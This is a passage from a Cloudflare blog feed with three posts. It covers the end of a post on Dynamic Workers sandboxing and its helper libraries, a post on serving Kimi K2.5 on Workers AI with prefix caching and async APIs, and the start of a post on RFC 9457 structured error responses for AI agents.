        
      </a>
    </div>
    <p>If you prefer to give your agents HTTP APIs, that's fully supported. Using the <code>globalOutbound</code> option to the worker loader API, you can register a callback to be invoked on every HTTP request, in which you can inspect the request, rewrite it, inject auth keys, respond to it directly, block it, or anything else you might like.</p><p>For example, you can use this to implement <b>credential injection</b> (token injection): When the agent makes an HTTP request to a service that requires authorization, you add credentials to the request on the way out. This way, the agent itself never knows the secret credentials, and therefore cannot leak them.</p><p>Using a plain HTTP interface may be desirable when an agent is talking to a well-known API that is in its training set, or when you want your agent to use a library that is built on a REST API (the library can run inside the agent's sandbox).</p><p>With that said, <b>in the absence of a compatibility requirement, TypeScript RPC interfaces are better than HTTP:</b></p><ul><li><p>As shown above, a TypeScript interface requires far fewer tokens to describe than an HTTP interface.</p></li><li><p>The agent can write code to call TypeScript interfaces using far fewer tokens than equivalent HTTP.</p></li><li><p>With TypeScript interfaces, since you are defining your own wrapper interface anyway, it is easier to narrow the interface to expose exactly the capabilities that you want to provide to your agent, both for simplicity and security. With HTTP, you are more likely implementing <i>filtering</i> of requests made against some existing API. This is hard, because your proxy must fully interpret the meaning of every API call in order to properly decide whether to allow it, and HTTP requests are complicated, with many headers and other parameters that could all be meaningful. It ends up being easier to just write a TypeScript wrapper that only implements the functions you want to allow.</p></li></ul>
    <div>
      <h3>Battle-hardened security</h3>
      <a href="#battle-hardened-security">
        
      </a>
    </div>
    <p>Hardening an isolate-based sandbox is tricky, as it is a more complicated attack surface than hardware virtual machines. Although all sandboxing mechanisms have bugs, security bugs in V8 are more common than security bugs in typical hypervisors. When using isolates to sandbox possibly-malicious code, it's important to have additional layers of defense-in-depth. Google Chrome, for example, implemented strict process isolation for this reason, but it is not the only possible solution.</p><p>We have nearly a decade of experience securing our isolate-based platform. Our systems automatically deploy V8 security patches to production within hours — faster than Chrome itself. Our <a href="https://blog.cloudflare.com/mitigating-spectre-and-other-security-threats-the-cloudflare-workers-security-model/"><u>security architecture</u></a> features a custom second-layer sandbox with dynamic cordoning of tenants based on risk assessments. <a href="https://blog.cloudflare.com/safe-in-the-sandbox-security-hardening-for-cloudflare-workers/"><u>We've extended the V8 sandbox itself</u></a> to leverage hardware features like MPK. We've teamed up with (and hired) leading researchers to develop <a href="https://blog.cloudflare.com/spectre-research-with-tu-graz/"><u>novel defenses against Spectre</u></a>. We also have systems that scan code for malicious patterns and automatically block them or apply additional layers of sandboxing. And much more.</p><p>When you use Dynamic Workers on Cloudflare, you get all of this automatically.</p>
    <div>
      <h2>Helper libraries</h2>
      <a href="#helper-libraries">
        
      </a>
    </div>
    <p>We've built a number of libraries that you might find useful when working with Dynamic Workers: </p>
    <div>
      <h3>Code Mode</h3>
      <a href="#code-mode">
        
      </a>
    </div>
    <p><a href="https://www.npmjs.com/package/@cloudflare/codemode"><code>@cloudflare/codemode</code></a> simplifies running model-generated code against AI tools using Dynamic Workers. At its core is <code>DynamicWorkerExecutor()</code>, which constructs a purpose-built sandbox with code normalisation to handle common formatting errors, and direct access to a <code>globalOutbound</code> fetcher for controlling <code>fetch()</code> behaviour inside the sandbox — set it to <code>null</code> for full isolation, or pass a <code>Fetcher</code> binding to route, intercept or enrich outbound requests from the sandbox.</p>
            <pre><code>const executor = new DynamicWorkerExecutor({
  loader: env.LOADER,
  globalOutbound: null, // fully isolated 
});

const codemode = createCodeTool({
  tools: myTools,
  executor,
});

return generateText({
  model,
  messages,
  tools: { codemode },
});
</code></pre>
            <p>The Code Mode SDK also provides two server-side utility functions. <code>codeMcpServer({ server, executor })</code> wraps an existing MCP Server, replacing its tool surface with a single <code>code()</code> tool. <code>openApiMcpServer({ spec, executor, request })</code> goes further: given an OpenAPI spec and an executor, it builds a complete MCP Server with <code>search()</code> and <code>execute()</code> tools as used by the Cloudflare MCP Server, and better suited to larger APIs.</p><p>In both cases, the code generated by the model runs inside Dynamic Workers, with calls to external services made over RPC bindings passed to the executor.</p><p><a href="https://www.npmjs.com/package/@cloudflare/codemode"><u>Learn more about the library and how to use it.</u></a> </p>
    <div>
      <h3>Bundling</h3>
      <a href="#bundling">
        
      </a>
    </div>
    <p>Dynamic Workers expect pre-bundled modules. <a href="https://www.npmjs.com/package/@cloudflare/worker-bundler"><code>@cloudflare/worker-bundler</code></a> handles that for you: give it source files and a <code>package.json</code>, and it resolves npm dependencies from the registry, bundles everything with <code>esbuild</code>, and returns the module map the Worker Loader expects.</p>
            <pre><code>import { createWorker } from "@cloudflare/worker-bundler";

const worker = env.LOADER.get("my-worker", async () =&gt; {
  const { mainModule, modules } = await createWorker({
    files: {
      "src/index.ts": `
        import { Hono } from 'hono';
        import { cors } from 'hono/cors';

        const app = new Hono();
        app.use('*', cors());
        app.get('/', (c) =&gt; c.text('Hello from Hono!'));
        app.get('/json', (c) =&gt; c.json({ message: 'It works!' }));

        export default app;
      `,
      "package.json": JSON.stringify({
        dependencies: { hono: "^4.0.0" }
      })
    }
  });

  return { mainModule, modules, compatibilityDate: "2026-01-01" };
});

await worker.getEntrypoint().fetch(request);
</code></pre>
            <p>It also supports full-stack apps via <code>createApp</code> — bundle a server Worker, client-side JavaScript, and static assets together, with built-in asset serving that handles content types, ETags, and SPA routing.</p><p><a href="https://www.npmjs.com/package/@cloudflare/worker-bundler"><u>Learn more about the library and how to use it.</u></a></p>
    <div>
      <h3>File manipulation</h3>
      <a href="#file-manipulation">
        
      </a>
    </div>
    <p><a href="https://www.npmjs.com/package/@cloudflare/shell"><code>@cloudflare/shell</code></a> gives your agent a virtual filesystem inside a Dynamic Worker. Agent code calls typed methods on a <code>state</code> object — read, write, search, replace, diff, glob, JSON query/update, archive — with structured inputs and outputs instead of string parsing.</p><p>Storage is backed by a durable <code>Workspace</code> (SQLite + R2), so files persist across executions. Coarse operations like <code>searchFiles</code>, <code>replaceInFiles</code>, and <code>planEdits</code> minimize RPC round-trips — the agent issues one call instead of looping over individual files. Batch writes are transactional by default: if any write fails, earlier writes roll back automatically.</p>
            <pre><code>import { Workspace } from "@cloudflare/shell";
import { stateTools } from "@cloudflare/shell/workers";
import { DynamicWorkerExecutor, resolveProvider } from "@cloudflare/codemode";

const workspace = new Workspace({
  sql: this.ctx.storage.sql, // Works with any DO's SqlStorage, D1, or custom SQL backend
  r2: this.env.MY_BUCKET, // large files spill to R2 automatically
  name: () =&gt; this.name   // lazy — resolved when needed, not at construction
});

// Code runs in an isolated Worker sandbox with no network access
const executor = new DynamicWorkerExecutor({ loader: env.LOADER });

// The LLM writes this code; `state.*` calls dispatch back to the host via RPC
const result = await executor.execute(
  `async () =&gt; {
    // Search across all TypeScript files for a pattern
    const hits = await state.searchFiles("src/**/*.ts", "answer");
    // Plan multiple edits as a single transaction
    const plan = await state.planEdits([
      { kind: "replace", path: "/src/app.ts",
        search: "42", replacement: "43" },
      { kind: "writeJson", path: "/src/config.json",
        value: { version: 2 } }
    ]);
    // Apply atomically — rolls back on failure
    return await state.applyEditPlan(plan);
  }`,
  [resolveProvider(stateTools(workspace))]
);</code></pre>
            <p>The package also ships prebuilt TypeScript type declarations and a system prompt template, so you can drop the full <code>state</code> API into your LLM context in a handful of tokens.</p><p><a href="https://www.npmjs.com/package/@cloudflare/shell"><u>Learn more about the library and how to use it.</u></a></p>
    <div>
      <h2>How are people using it?</h2>
      <a href="#how-are-people-using-it">
        
      </a>
    </div>
    
    <div>
      <h4>Code Mode</h4>
      <a href="#code-mode">
        
      </a>
    </div>
    <p>Developers want their agents to write and execute code against tool APIs, rather than making sequential tool calls one at a time. With Dynamic Workers, the LLM generates a single TypeScript function that chains multiple API calls together, runs it in a Dynamic Worker, and returns the final result back to the agent. As a result, only the output, and not every intermediate step, ends up in the context window. This cuts both latency and token usage, and produces better results, especially when the tool surface is large.</p><p>Our own <a href="https://github.com/cloudflare/mcp-server-cloudflare">Cloudflare MCP server</a> is built exactly this way: it exposes the entire Cloudflare API through just two tools — search and execute — in under 1,000 tokens, because the agent writes code against a typed API instead of navigating hundreds of individual tool definitions.</p>
    <div>
      <h4>Building custom automations </h4>
      <a href="#building-custom-automations">
        
      </a>
    </div>
    <p>Developers are using Dynamic Workers to let agents build custom automations on the fly. <a href="https://www.zite.com/"><u>Zite</u></a>, for example, is building an app platform where users interact through a chat interface — the LLM writes TypeScript behind the scenes to build CRUD apps, connect to services like Stripe, Airtable, and Google Calendar, and run backend logic, all without the user ever seeing a line of code. Every automation runs in its own Dynamic Worker, with access to only the specific services and libraries that the endpoint needs.</p><blockquote><p><i>“To enable server-side code for Zite’s LLM-generated apps, we needed an execution layer that was instant, isolated, and secure. Cloudflare’s Dynamic Workers hit the mark on all three, and out-performed all of the other platforms we benchmarked for speed and library support. The NodeJS compatible runtime supported all of Zite’s workflows, allowing hundreds of third party integrations, without sacrificing on startup time. Zite now services millions of execution requests daily thanks to Dynamic Workers.” </i></p><p><i>— </i><b><i>Antony Toron</i></b><i>, CTO and Co-Founder, Zite </i></p></blockquote>
    <div>
      <h4>Running AI-generated applications</h4>
      <a href="#running-ai-generated-applications">
        
      </a>
    </div>
    <p>Developers are building platforms that generate full applications from AI — either for their customers or for internal teams building prototypes. With Dynamic Workers, each app can be spun up on demand, then put back into cold storage until it's invoked again. Fast startup times make it easy to preview changes during active development. Platforms can also block or intercept any network requests the generated code makes, keeping AI-generated apps safe to run.</p>
    <div>
      <h2>Pricing</h2>
      <a href="#pricing">
        
      </a>
    </div>
    <p>Dynamically-loaded Workers are priced at $0.002 per unique Worker loaded per day (as of this post’s publication), in addition to the usual CPU time and invocation pricing of regular Workers.</p><p>For AI-generated "code mode" use cases, where every Worker is a unique one-off, this means the price is $0.002 per Worker loaded (plus CPU and invocations). This cost is typically negligible compared to the inference costs to generate the code.</p><p>During the beta period, the $0.002 charge is waived. As pricing is subject to change, please always check our Dynamic Workers <a href="https://developers.cloudflare.com/dynamic-workers/pricing/"><u>pricing</u></a> for the most current information. </p>
    <div>
      <h2>Get Started</h2>
      <a href="#get-started">
        
      </a>
    </div>
    <p>If you’re on the Workers Paid plan, you can start using <a href="https://developers.cloudflare.com/dynamic-workers/">Dynamic Workers</a> today. </p>
    <div>
      <h4>Dynamic Workers Starter</h4>
      <a href="#dynamic-workers-starter">
        
      </a>
    </div>
    <a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/agents/tree/main/examples/dynamic-workers"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p>
<p>Use this “hello world” <a href="https://github.com/cloudflare/agents/tree/main/examples/dynamic-workers">starter</a> to get a Worker deployed that can load and execute Dynamic Workers. </p>
    <div>
      <h4>Dynamic Workers Playground</h4>
      <a href="#dynamic-workers-playground">
        
      </a>
    </div>
    <a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/agents/tree/main/examples/dynamic-workers-playground"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>You can also deploy the <a href="https://github.com/cloudflare/agents/tree/main/examples/dynamic-workers-playground">Dynamic Workers Playground</a>, where you’ll be able to write or import code, bundle it at runtime with <code>@cloudflare/worker-bundler</code>, execute it through a Dynamic Worker, see real-time responses and execution logs. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/32d0ficYALnSneKc4jZPja/0d4d07d747fc14936f16071714b7a8e5/BLOG-3243_2.png" />
          </figure><p>Dynamic Workers are fast, scalable, and lightweight. <a href="https://discord.com/channels/595317990191398933/1460655307255578695"><u>Find us on Discord</u></a> if you have any questions. We’d love to see what you build!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/mQOJLnMtXULmj6l3DgKZg/ef2ee4cef616bc2d9a7caf35df5834f5/BLOG-3243_3.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[MCP]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Agents]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">1tc7f8AggVLw5D8OmaZri5</guid>
            <dc:creator>Kenton Varda</dc:creator>
            <dc:creator>Sunil Pai</dc:creator>
            <dc:creator>Ketan Gupta</dc:creator>
        </item>
        <item>
            <title><![CDATA[Powering the agents: Workers AI now runs large models, starting with Kimi K2.5]]></title>
            <link>https://blog.cloudflare.com/workers-ai-large-models/</link>
            <pubDate>Thu, 19 Mar 2026 19:53:16 GMT</pubDate>
            <description><![CDATA[ Kimi K2.5 is now on Workers AI, helping you power agents entirely on Cloudflare’s Developer Platform. Learn how we optimized our inference stack and reduced inference costs for internal agent use cases.  ]]></description>
            <content:encoded><![CDATA[ <p>We're making Cloudflare the best place for building and deploying agents. But reliable agents aren't built on prompts alone; they require a robust, coordinated infrastructure of underlying primitives. </p><p>At Cloudflare, we have been building these primitives for years: <a href="https://developers.cloudflare.com/durable-objects/"><u>Durable Objects</u></a> for state persistence, <a href="https://developers.cloudflare.com/workflows/"><u>Workflows</u></a> for long running tasks, and <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/worker-loader/"><u>Dynamic Workers</u></a> or <a href="https://developers.cloudflare.com/sandbox/"><u>Sandbox</u></a> containers for secure execution. Powerful abstractions like the <a href="https://developers.cloudflare.com/agents/"><u>Agents SDK</u></a> are designed to help you build agents on top of Cloudflare’s Developer Platform.</p><p>But these primitives only provided the execution environment. The agent still needed a model capable of powering it. </p><p>Starting today, Workers AI is officially in the big models game. We now offer frontier open-source models on our AI inference platform. We’re starting by releasing <a href="https://www.kimi.com/blog/kimi-k2-5"><u>Moonshot AI’s Kimi K2.5</u></a> model <a href="https://developers.cloudflare.com/workers-ai/models/kimi-k2.5"><u>on Workers AI</u></a>. With a full 256k context window and support for multi-turn tool calling, vision inputs, and structured outputs, the Kimi K2.5 model is excellent for all kinds of agentic tasks. By bringing a frontier-scale model directly into the Cloudflare Developer Platform, we’re making it possible to run the entire agent lifecycle on a single, unified platform.</p><p>The heart of an agent is the AI model that powers it, and that model needs to be smart, with high reasoning capabilities and a large context window. Workers AI now runs those models.</p>
    <div>
      <h2>The price-performance sweet spot</h2>
      <a href="#the-price-performance-sweet-spot">
        
      </a>
    </div>
    <p>We spent the last few weeks testing Kimi K2.5 as the engine for our internal development tools. Within our <a href="https://opencode.ai/"><u>OpenCode</u></a> environment, Cloudflare engineers use Kimi as a daily driver for agentic coding tasks. We have also integrated the model into our automated code review pipeline; you can see this in action via our public code review agent, <a href="https://github.com/ask-bonk/ask-bonk"><u>Bonk</u></a>, on Cloudflare GitHub repos. In production, the model has proven to be a fast, efficient alternative to larger proprietary models without sacrificing quality.</p><p>Serving Kimi K2.5 began as an experiment, but it quickly became critical after reviewing how the model performs and how cost-efficient it is. As an illustrative example: we have an agent that does security reviews of Cloudflare’s codebases. This agent processes over 7B tokens per day, and using Kimi, it has caught more than 15 confirmed issues in a single codebase. Doing some rough math, if we had run this agent on a mid-tier proprietary model, we would have spent $2.4M a year for this single use case, on a single codebase. Running this agent with Kimi K2.5 cost just a fraction of that: we cut costs by 77% simply by making the switch to Workers AI.</p><p>As AI adoption increases, we are seeing a fundamental shift not only in how engineering teams are operating, but how individuals are operating. It is becoming increasingly common for people to have a personal agent like <a href="https://openclaw.ai/"><u>OpenClaw</u></a> running 24/7. The volume of inference is skyrocketing.</p><p>This new rise in personal and coding agents means that cost is no longer a secondary concern; it is the primary blocker to scaling. When every employee has multiple agents processing hundreds of thousands of tokens per hour, the math for proprietary models stops working. Enterprises will look to transition to open-source models that offer frontier-level reasoning without the proprietary price tag. Workers AI is here to facilitate this shift, providing everything from serverless endpoints for a personal agent to dedicated instances powering autonomous agents across an entire organization.</p>
    <div>
      <h2>The large model inference stack</h2>
      <a href="#the-large-model-inference-stack">
        
      </a>
    </div>
    <p>Workers AI has served models, including LLMs, since its launch two years ago, but we’ve historically prioritized smaller models. Part of the reason was that for some time, open-source LLMs fell far behind the models from frontier model labs. This changed with models like Kimi K2.5, but to serve this type of very large LLM, we had to make changes to our inference stack. We wanted to share with you some of what goes on behind the scenes to support a model like Kimi.</p><p>We’ve been working on custom kernels for Kimi K2.5 to optimize how we serve the model, which is built on top of our proprietary <a href="https://blog.cloudflare.com/cloudflares-most-efficient-ai-inference-engine/"><u>Infire inference engine</u></a>. Custom kernels improve the model’s performance and GPU utilization, unlocking gains that would otherwise go unclaimed if you were just running the model out of the box. There are also multiple techniques and hardware configurations that can be leveraged to serve a large model. Developers typically use a combination of data, tensor, and expert parallelization techniques to optimize model performance. Strategies like disaggregated prefill are also important, in which you separate the prefill and generation stages onto different machines in order to get better throughput or higher GPU utilization. Implementing these techniques and incorporating them into the inference stack takes a lot of dedicated experience to get right. </p><p>Workers AI has already done the experimentation with serving techniques to yield excellent throughput on Kimi K2.5. A lot of this does not come out of the box when you self-host an open-source model. The benefit of using a platform like Workers AI is that you don’t need to be a Machine Learning Engineer, a DevOps expert, or a Site Reliability Engineer to do the optimizations required to host it: we’ve already done the hard part, you just need to call an API.</p>
    <div>
      <h2>Beyond the model — platform improvements for agentic workloads</h2>
      <a href="#beyond-the-model-platform-improvements-for-agentic-workloads">
        
      </a>
    </div>
    <p>In concert with this launch, we’ve also improved our platform and are releasing several new features to help you build better agents.</p>
    <div>
      <h3>Prefix caching and surfacing cached tokens</h3>
      <a href="#prefix-caching-and-surfacing-cached-tokens">
        
      </a>
    </div>
    <p>When you work with agents, you are likely sending a large number of input tokens as part of the context: this could be detailed system prompts, tool definitions, MCP server tools, or entire codebases. Inputs can be as large as the model context window, so in theory, you could be sending requests with almost 256k input tokens. That’s a lot of tokens.</p><p>When an LLM processes a request, the request is broken down into two stages: the prefill stage processes input tokens and the output stage generates output tokens. These stages are usually sequential, where input tokens have to be fully processed before you can generate output tokens. This means that sometimes the GPU is not fully utilized while the model is doing prefill.</p><p>With multi-turn conversations, when you send a new prompt, the client sends all the previous prompts, tools, and context from the session to the model as well. The delta between consecutive requests is usually just a few new lines of input; all the other context has already gone through the prefill stage during a previous request. This is where prefix caching helps. Instead of doing prefill on the entire request, we can cache the input tensors from a previous request, and only do prefill on the new input tokens. This saves a lot of time and compute from the prefill stage, which means a faster Time to First Token (TTFT) and a higher Tokens Per Second (TPS) throughput as you’re not blocked on prefill.</p><p>Workers AI has always done prefix caching, but we are now surfacing cached tokens as a usage metric and offering a discount on cached tokens compared to input tokens. (Pricing can be found on the <a href="https://developers.cloudflare.com/workers-ai/models/kimi-k2.5/"><u>model page</u></a>.) We also have new techniques for you to leverage in order to get a higher prefix cache hit rate, reducing your costs.</p>
    <div>
      <h3>New session affinity header for higher cache hit rates</h3>
      <a href="#new-session-affinity-header-for-higher-cache-hit-rates">
        
      </a>
    </div>
    <p>In order to route to the same model instance and take advantage of prefix caching, we use a new <code>x-session-affinity</code> header. When you send this header, you’ll improve your cache hit ratio, leading to more cached tokens and subsequently, faster TTFT, TPS, and lower inference costs.</p><p>You can pass the new header like below, with a unique string per session or per agent. Some clients like OpenCode implement this automatically out of the box. Our <a href="https://github.com/cloudflare/agents-starter"><u>Agents SDK starter</u></a> has already set up the wiring to do this for you, too.</p>
            <pre><code>curl -X POST \
"https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/moonshotai/kimi-k2.5" \
  -H "Authorization: Bearer {API_TOKEN}" \
  -H "Content-Type: application/json" \
  -H "x-session-affinity: ses_12345678" \
  -d '{
    "messages": [
      {
        "role": "system",
        "content": "You are a helpful assistant."
      },
      {
        "role": "user",
        "content": "What is prefix caching and why does it matter?"
      }
    ],
    "max_tokens": 2400,
    "stream": true
  }'
</code></pre>
            
    <div>
      <h3>Redesigned async APIs</h3>
      <a href="#redesigned-async-apis">
        
      </a>
    </div>
    <p>Serverless inference is really hard. With a pay-per-token business model, it’s cheaper on a single request basis because you don’t need to pay for entire GPUs to service your requests. But there’s a trade-off: you have to contend with other people’s traffic and capacity constraints, and there’s no strict guarantee that your request will be processed. This is not unique to Workers AI — it’s evidently the case across serverless model providers, given the frequent news reports of overloaded providers and service disruptions. While we always strive to serve your request and have built-in autoscaling and rebalancing, there are hard limitations (like hardware) that make this a challenge.</p><p>For volumes of requests that would exceed synchronous rate limits, you can submit batches of inferences to be completed asynchronously. We’re introducing a revamped Asynchronous API, which means that for asynchronous use cases, you won’t run into Out of Capacity errors and inference will execute durably at some point. Our async API looks more like flex processing than a batch API, where we process requests in the async queue as long as we have headroom in our model instances. With internal testing, our async requests usually execute within 5 minutes, but this will depend on what live traffic looks like. As we bring Kimi to the public, we will tune our scaling accordingly, but the async API is the best way to make sure you don’t run into capacity errors in durable workflows. This is perfect for use cases that are not real-time, such as code scanning agents or research agents.</p><p>Workers AI previously had an asynchronous API, but we’ve recently revamped the systems under the hood. We now rely on a pull-based system versus the historical push-based system, allowing us to pull in queued requests as soon as we have capacity. We’ve also added better controls to tune the throughput of async requests, monitoring GPU utilization in real-time and pulling in async requests when utilization is low, so that critical synchronous requests get priority while still processing asynchronous requests efficiently.</p><p>To use the asynchronous API, you would send your requests as seen below. We also have a way to <a href="https://developers.cloudflare.com/workers-ai/platform/event-subscriptions/"><u>set up event notifications</u></a> so that you can know when the inference is complete instead of polling for the request. </p>
            <pre><code>// (1.) Push a request in queue
// pass queueRequest: true
let res = await env.AI.run("@cf/moonshotai/kimi-k2.5", {
  "requests": [{
    "messages": [{
      "role": "user",
      "content": "Tell me a joke"
    }]
  }, {
    "messages": [{
      "role": "user",
      "content": "Explain the Pythagoras theorem"
    }]
  }, ...{&lt;add more requests in a batch&gt;} ];
}, {
  queueRequest: true,
});


// (2.) grab the request id
let request_id;
if(res &amp;&amp; res.request_id){
  request_id = res.request_id;
}
// (3.) poll the status
let res = await env.AI.run("@cf/moonshotai/kimi-k2.5", {
  request_id: request_id
});

if(res &amp;&amp; res.status === "queued" || res.status === "running") {
 // retry by polling again
 ...
}
else 
 return Response.json(res); // This will contain the final completed response 
</code></pre>
            
    <div>
      <h2>Try it out today</h2>
      <a href="#try-it-out-today">
        
      </a>
    </div>
    <p>Get started with Kimi K2.5 on Workers AI today. You can read our developer docs to find out <a href="https://developers.cloudflare.com/workers-ai/models/kimi-k2.5/"><u>model information and pricing</u></a>, and how to take advantage of <a href="https://developers.cloudflare.com/workers-ai/features/prompt-caching/"><u>prompt caching via session affinity headers</u></a> and <a href="https://developers.cloudflare.com/workers-ai/features/batch-api/"><u>asynchronous API</u></a>. The <a href="https://github.com/cloudflare/agents-starter"><u>Agents SDK starter</u></a> also now uses Kimi K2.5 as its default model. You can also <a href="https://opencode.ai/docs/providers/"><u>connect to Kimi K2.5 on Workers AI via Opencode</u></a>. For a live demo, try it in our <a href="https://playground.ai.cloudflare.com/"><u>playground</u></a>.</p><p>And if this set of problems around serverless inference, ML optimizations, and GPU infrastructure sound  interesting to you — <a href="https://job-boards.greenhouse.io/cloudflare/jobs/6297179?gh_jid=6297179"><u>we’re hiring</u></a>!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/36JzF0zePj2z7kZQK8Q2fg/73b0a7206d46f0eef170ffd1494dc4b3/BLOG-3247_2.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Agents]]></category>
            <guid isPermaLink="false">1wSO33KRdd5aUPAlSVDiqU</guid>
            <dc:creator>Michelle Chen</dc:creator>
            <dc:creator>Kevin Flansburg</dc:creator>
            <dc:creator>Ashish Datta</dc:creator>
            <dc:creator>Kevin Jain</dc:creator>
        </item>
        <item>
            <title><![CDATA[Slashing agent token costs by 98% with RFC 9457-compliant error responses]]></title>
            <link>https://blog.cloudflare.com/rfc-9457-agent-error-pages/</link>
            <pubDate>Wed, 11 Mar 2026 13:05:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare now returns RFC 9457-compliant structured Markdown and JSON error payloads to AI agents, replacing heavyweight HTML pages with machine-readable instructions. This reduces token usage by over 98%, turning brittle parsing into efficient control flow. ]]></description>
            <content:encoded><![CDATA[ <p>AI agents are no longer experiments. They are production infrastructure, making billions of HTTP requests per day, navigating the web, calling APIs, and orchestrating complex workflows.</p><p>But when these agents hit an error, they still receive the same HTML error pages we built for browsers: hundreds of lines of markup, CSS, and copy designed for human eyes. Those pages give agents clues, not instructions, and waste time and tokens. That gap is the opportunity to give agents instructions, not obstacles.</p><p>Starting today, Cloudflare returns <a href="https://www.rfc-editor.org/rfc/rfc9457">RFC 9457</a>-compliant structured Markdown and JSON error payloads to AI agents, replacing heavyweight HTML pages with machine-readable instructions.</p><p>That means when an agent sends <code>Accept: text/markdown</code>, <code>Accept: application/json</code>, or <code>Accept: application/problem+json</code> and encounters a Cloudflare error, we return one semantic contract in a structured format instead of HTML. And it comes complete with actionable guidance. (This builds on our recent <a href="https://blog.cloudflare.com/markdown-for-agents/">Markdown for Agents</a> release.)</p><p>So instead of being told only "You were blocked," the agent will read: "You were rate-limited — wait 30 seconds and retry with exponential backoff." Instead of just "Access denied," the agent will be instructed: "This block is intentional: do not retry, contact the site owner."</p><p>These responses are not just clearer — they are dramatically more efficient. Structured error responses cut payload size and token usage by more than 98% versus HTML, measured against a live 1015 ('rate-limit') error response. For agents that hit multiple errors in a workflow, the savings compound quickly.</p><p>This is live across the Cloudflare network, automatically. Site owners do not need to configure anything. Browsers keep getting the same HTML experience as before.</p><p>These are not just error pages. They are instructions for the agentic web.</p>
    <div>
      <h3>What agents see today</h3>
      <a href="#what-agents-see-today">
        
      </a>
    </div>
    <p>When an agent receives a Cloudflare-generated error, it usually means Cloudflare is enforcing customer policy or returning a platform response on the customer's behalf — not that Cloudflare is down. These responses are triggered when a request cannot be served as-is, such as invalid host or DNS routing, customer-defined access controls (WAF, geo, ASN, or bot rules), or edge-enforced limits like rate limiting. In short, Cloudflare is acting as the customer's routing and security layer, and the response explains why the request was blocked or could not proceed.</p><p>Today, those responses are rendered as HTML designed for humans:</p>
            <pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Access denied | example.com used Cloudflare to restrict access&lt;/title&gt;
&lt;style&gt;/* 200 lines of CSS */&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;div class="cf-wrapper"&gt;
    &lt;h1 data-translate="block_headline"&gt;Sorry, you have been blocked&lt;/h1&gt;
    &lt;!-- ... hundreds more lines ... --&gt;
  &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;</code></pre>
            <p>To an agent, this is garbage. It cannot determine what error occurred, why it was blocked, or whether retrying will help. Even if it parses the HTML, the content describes the error but doesn't tell the agent — or the human, for that matter — what to do next.</p><p>If you're an agent developer and you wanted to handle Cloudflare errors gracefully, your options were limited. For Cloudflare-generated errors, structured responses existed only in configuration-dependent paths, not as a consistent default for agents.</p><p>Custom Error Rules can customize many Cloudflare errors, including some 1xxx cases. But they depend on per-site configuration, so they cannot serve as a universal agent contract across the web. Cloudflare sits in front of the request path. That means we can define a default machine response: retry or stop, wait and back off, escalate or reroute. Error pages stop being decoration and become execution instructions.</p>
    <div>
      <h3>What we did</h3>
      <a href="#what-we-did">
        
      </a>
    </div>
    <p>Cloudflare now returns RFC 9457-compliant structured responses for all 1xxx-class error paths — Cloudflare's platform error codes for edge-side failures like DNS resolution issues, access denials, and rate limits. Both formats are live: <code>Accept: text/markdown</code> returns Markdown, <code>Accept: application/json</code> returns JSON, and <code>Accept: application/problem+json</code> returns JSON with the <code>application/problem+json</code> content type.</p><p>This covers all 1xxx-class errors today. The same contract will extend to Cloudflare-generated 4xx and 5xx errors next.</p><p>Markdown responses have two parts:</p><ul><li><p>YAML frontmatter for machine-readable fields</p></li><li><p>prose sections for explicit guidance (<code>What happened</code> and <code>What you should do</code>)</p></li></ul><p>JSON responses carry the same fields as a flat object.</p><p>The YAML frontmatter is the critical layer for automation. It lets an agent extract stable keys without scraping HTML or guessing intent from copy. Fields like <code>error_code</code>, <code>error_name</code>, and <code>error_category</code> let the agent classify the failure. <code>retryable</code> and <code>retry_after</code> drive backoff logic. <code>owner_action_required</code> tells the agent whether to keep trying or escalate. <code>ray_id</code>, <code>timestamp</code>, and <code>zone</code> make logs and support handoffs deterministic.</p><p>The schema is stable by design, so agents can implement durable control flow without chasing presentation changes.</p><p>That stability is not a Cloudflare invention. <a href="https://www.rfc-editor.org/rfc/rfc9457">RFC 9457 — Problem Details for HTTP APIs</a> defines a standard JSON shape for reporting errors over HTTP, so clients can parse error responses without knowing the specific API in advance. Our JSON responses follow this shape, which means any HTTP client that understands Problem Details can parse the base members without Cloudflare-specific code:</p><table><tr><td><p><b>RFC 9457 member</b></p></td><td><p><b>What it contains</b></p></td></tr><tr><td><p><code>type</code></p></td><td><p>A URI pointing to Cloudflare's documentation for the specific error code</p></td></tr><tr><td><p><code>status</code></p></td><td><p>The HTTP status code (matching the actual response status)</p></td></tr><tr><td><p><code>title</code></p></td><td><p>A short, human-readable summary of the problem</p></td></tr><tr><td><p><code>detail</code></p></td><td><p>A human-readable explanation specific to this occurrence</p></td></tr><tr><td><p><code>instance</code></p></td><td><p>The Ray ID identifying this specific error occurrence</p></td></tr></table><p>The operational fields — <code>error_code</code>, <code>error_category</code>, <code>retryable</code>, <code>retry_after</code>, <code>owner_action_required</code>, and more — are RFC 9457 extension members. Clients that don't recognize them simply ignore them.</p><p>This is network-wide and additive. Site owners do not need to configure anything. Browsers keep receiving HTML unless clients explicitly ask for Markdown or JSON.</p>
    <div>
      <h3>What the response looks like</h3>
      <a href="#what-the-response-looks-like">
        
      </a>
    </div>
    <p>Here is what a rate-limit error (<code>1015</code>) looks like in JSON:</p>
            <pre><code>{
